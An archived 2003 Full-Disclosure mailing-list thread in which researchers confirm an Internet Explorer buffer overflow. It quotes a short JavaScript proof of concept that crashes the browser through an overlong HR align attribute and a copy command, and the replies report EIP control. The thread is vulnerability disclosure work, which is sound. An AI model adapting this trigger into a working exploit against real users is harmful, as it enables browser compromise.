[Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow

From: SecurITeam BugTraq Monitoring (bugtraq_at_securiteam.com)
Date: 06/25/03

  • Next message: Cesar: "Re: [Full-Disclosure] RE: [Symantec Security Advisor] Symantec Security Check ActiveX Buffer Overflow" 
    To: "KF" <dotslash@snosoft.com>, "Digital Scream" <digitalscream@real.xakep.ru>
Date: Wed, 25 Jun 2003 13:05:20 +0200

    Hi,

    I can confirm it under Windows 2000 with IE 5.50.4807.2300

    Full control over the EIP, but the shellcode cannot contain (as it currently
    appears) non Alpha Numeric characters, too bad I guess.

    Thanks
    Noam Rathaus
    CTO
    Beyond Security Ltd
    http://www.SecurITeam.com
    http://www.BeyondSecurity.com
    ----- Original Message -----
    From: "KF" <dotslash@snosoft.com>
    To: "Digital Scream" <digitalscream@real.xakep.ru>
    Sent: Monday, June 23, 2003 6:43 PM
    Subject: Re: Internet Explorer >=5.0 : Buffer overflow

    > I can confirm this on Windows XP Professional
    >
    > version 6.0.2800.1106.xpsp2-030422-1633
    >
    > 0x43534c41 refrenced mem at 0x43534c41
    > -KF
    >
    >
    > Digital Scream wrote:
    >
    > >&lt;script&gt;
    > > wnd=open("about:blank","","");
    > > wnd.moveTo(screen.Width,screen.Height);
    > > WndDoc=wnd.document;
    > > WndDoc.open();
    > > WndDoc.clear();
    > > buffer="";
    > > for(i=1;i<=127;i++)buffer+="X";
    > > buffer+="DigitalScream";
    > > WndDoc.write("<HR align='"+buffer+"'>");
    > > WndDoc.execCommand("SelectAll");
    > > WndDoc.execCommand("Copy");
    > > wnd.close();
    > >&lt;/script&gt;
    > >
    > >Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
    > >
    > >
    > >
    >
    >
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Cesar: "Re: [Full-Disclosure] RE: [Symantec Security Advisor] Symantec Security Check ActiveX Buffer Overflow"

    Relevant Pages

    • [Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow
      ... I can confirm it under Windows 2000 with IE 5.50.4807.2300 ... Full control over the EIP, but the shellcode cannot contain (as it currently ...
      (Securiteam)
    • Re: older games dont work
      ... the support of my work have it and will burn a CD to me. ... and any other tips to make this game works will be great. ... Windows 95 including but not limited to: ... to map a pedal as a control ...
      (microsoft.public.windowsxp.games)
    • Re: Listing of XP tools commands
      ... All files with a .cpl extension are normally invoked via the Control ... IP Configuration - ipconfi/all ... Logs You Out Of Windows - logoff... ... System File Checker Utility - sfc /revert ...
      (microsoft.public.windowsxp.general)
    • Re: Listing of XP tools commands
      ... All files with a .cpl extension are normally invoked via the Control ... IP Configuration - ipconfi/all ... Logs You Out Of Windows - logoff... ... System File Checker Utility - sfc /revert ...
      (microsoft.public.windowsxp.general)
    • Re: Listing of XP tools commands
      ... [I found that page in a few seconds by Googling "run commands winxp", ... All files with a .cpl extension are normally invoked via the Control ... Logs You Out Of Windows - logoff... ... System File Checker Utility - sfc /revert ...
      (microsoft.public.windowsxp.general)